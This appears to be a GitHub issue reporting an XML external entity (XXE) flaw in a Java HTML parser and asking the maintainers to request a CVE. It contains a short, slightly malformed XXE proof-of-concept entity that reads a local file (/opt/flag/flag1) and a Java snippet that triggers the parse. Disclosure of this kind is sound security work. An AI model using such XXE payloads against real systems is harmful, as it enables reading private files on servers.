You signed in with another tab or window. Reload to refresh your session.You signed out in another tab or window. Reload to refresh your session.You switched accounts on another tab or window. Reload to refresh your session.Dismiss alert
Can you apply for cve for me? I need this, it's actually attackable.
Files can be read through such poc
``?xml version="1.0" encoding="utf-8"?>
!DOCTYPE any [
!ENTITY a SYSTEM "file:///opt/flag/flag1">
]>```
Describe the bug
If the user controls the data
To Reproduce
public static void main(String[] args) { try (Document document = new Document()) { HtmlParser.parse(document, "file:///D:\\XXEPOC.xml"); } catch (DocumentException de) { System.err.println(de.getMessage()); } }
Expected behavior
">This will send out the data
System (please complete the following information):
All system
Additional context
Please help me apply for CVE number, thank you!
The text was updated successfully, but these errors were encountered: